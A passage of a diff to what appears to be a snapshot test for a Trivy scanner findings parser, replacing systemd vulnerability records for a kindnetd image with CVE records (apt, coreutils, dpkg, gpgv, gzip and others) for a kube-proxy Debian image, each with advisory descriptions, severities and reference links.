+ "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.36.1-8+deb11u1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", ], }, "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "coreutils: race condition vulnerability in chown and chgrp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.20.10", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.20.9", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-5446-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "2.2.27-2+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5503-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5503-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5174", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, ], "severity": "MEDIUM", @@ -145455,233 +147029,248 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.27-2+deb11u1", + "packageName": "gpgv", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "denial of service issue (resource consumption) using compressed packets", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "1.10-4+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.10-4", + "packageName": "gzip", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": 